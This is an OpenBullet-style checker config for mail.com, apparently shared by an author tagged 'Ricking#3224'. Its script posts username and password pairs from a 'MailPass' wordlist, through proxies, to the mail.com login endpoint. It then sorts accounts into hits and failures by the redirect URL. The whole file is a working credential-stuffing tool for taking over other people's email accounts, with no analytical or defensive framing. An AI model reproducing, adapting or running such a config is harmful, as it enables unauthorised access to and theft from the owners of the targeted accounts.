[SETTINGS]
{
  "Name": "Mail.com",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-12-11T13:18:59.7140793+11:00",
  "AdditionalInfo": "Ricking#3224",
  "Author": "Ricking#3224",
  "Version": "1.3.5 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [
    {
      "SliceName": "https://login.mail.com/login",
      "RuleType": 1,
      "RuleString": "@gmail.com",
      "Id": 1439564473
    }
  ],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Transparent": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://login.mail.com/login" 
  CONTENT "service=mailint&uasServiceID=mc_starter_mailcom&successURL=https%3A%2F%2F%24%28clientName%29-%24%28dataCenter%29.mail.com%2Flogin&loginFailedURL=https%3A%2F%2Fwww.mail.com%2Fint%2Flogout%2F%3Fls%3Dwd&loginErrorURL=https%3A%2F%2Fwww.mail.com%2Fint%2Flogout%2F%3Fls%3Dte&edition=int&lang=en&usertype=standard&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: no-cache" 
  HEADER "content-length: 352" 
  HEADER "origin: https://www.mail.com" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://www.mail.com/" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<ADDRESS>" EqualTo "https://www.mail.com/int/logout/?ls=wd" 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" Contains "https://navigator-lxa.mail.com/login?auth_time=" 
  
